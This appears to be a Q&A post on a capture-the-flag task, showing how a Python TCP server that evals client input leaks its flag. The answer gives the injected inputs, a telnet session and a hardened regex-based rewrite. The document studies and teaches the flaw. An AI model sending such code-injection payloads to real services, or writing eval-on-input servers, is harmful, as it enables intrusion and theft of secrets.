Injecting Python code into TCP socket server
I am stuck on a task question I'm solving in penetration testing. I'm given a simple TCP web server; you connect to it and give 2 values, and if they match in the end, you get the flag. I'm also given a snippet of the server code. I have tried to find out the flag. Here's the code:

    clientsock.send("welcome maths_server 1.0\n")
    try:
        clientsock.send("enter first number, can evaluate it:\n")
        firstnum = eval(clientsock.recv(1024))
        firstnum = firstnum + firstnum + ord(flag[4]) + ord(flag[8]) + ord(flag[5])
        clientsock.send("enter second number, can evaluate it:\n")
        secondnum = eval(clientsock.recv(1024))
        if secondnum == firstnum:
            clientsock.send("the flag is: " + flag + "\n")
        firstnum = 0
        secondnum = 0
    except:
        pass
    clientsock.close()

Just send the string firstnum as the second message. This will succeed no matter what value you used for firstnum initially:

    secondnum = eval(clientsock.recv(1024))
    -> secondnum = eval("firstnum")
    -> secondnum = ... value of firstnum

This can be done with telnet:

    $ telnet services.cyberprotection.agency 3166
    welcome maths_server 1.0
    enter first number, can evaluate it:
    10
    enter second number, can evaluate it:
    firstnum
    flag is: .... (try yourself)...

Another possibility is to send the string clientsock.send(flag) as the first number, which will send the value of flag back. Note that this will not work with the test server, so I guess the source code there is different and will not execute any kind of code given by the remote user, but only if it matches the expectations of the task you got. It works with a test installation of the given code.
Which leads to the conclusion that one should never ever eval unsanitized user input.
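
A hardened version of the number handling from the snippet above, as an added example that is not part of the original post or the challenge's server code. It is written for Python 3; the names parse_number and handle_round, the reply strings for bad input, and the sample flag are assumptions.

```python
import re

# Accept only an optionally signed decimal integer of bounded length.
_NUMBER_RE = re.compile(rb"[+-]?[0-9]{1,18}")
FLAG = "FLAG{constructed-sample}"  # constructed placeholder, not a real flag


def parse_number(raw: bytes) -> int:
    """Turn one received message into an int without evaluating it."""
    token = raw.strip()  # drops the trailing \r\n that telnet sends
    if not _NUMBER_RE.fullmatch(token):
        raise ValueError("not a decimal integer")
    return int(token)


def handle_round(first_raw: bytes, second_raw: bytes, flag: str = FLAG) -> str:
    """Same arithmetic as the page's snippet, with eval() replaced.

    Returns the reply the server would send (hypothetical wording for the
    two failure cases, which the original snippet does not have).
    """
    try:
        firstnum = parse_number(first_raw)
        firstnum = firstnum + firstnum + ord(flag[4]) + ord(flag[8]) + ord(flag[5])
        secondnum = parse_number(second_raw)
    except ValueError:
        return "invalid input\n"
    if secondnum == firstnum:
        return "the flag is: " + flag + "\n"
    return "wrong\n"


if __name__ == "__main__":
    # The two inputs from the answer above are now plain data, not code.
    print(handle_round(b"10\n", b"firstnum\n"), end="")
    print(handle_round(b"clientsock.send(flag)\n", b"0\n"), end="")
```

Because the input is matched against a strict pattern before conversion, names, calls and expressions never reach an interpreter, and the handler's local variables cannot be referenced by the client.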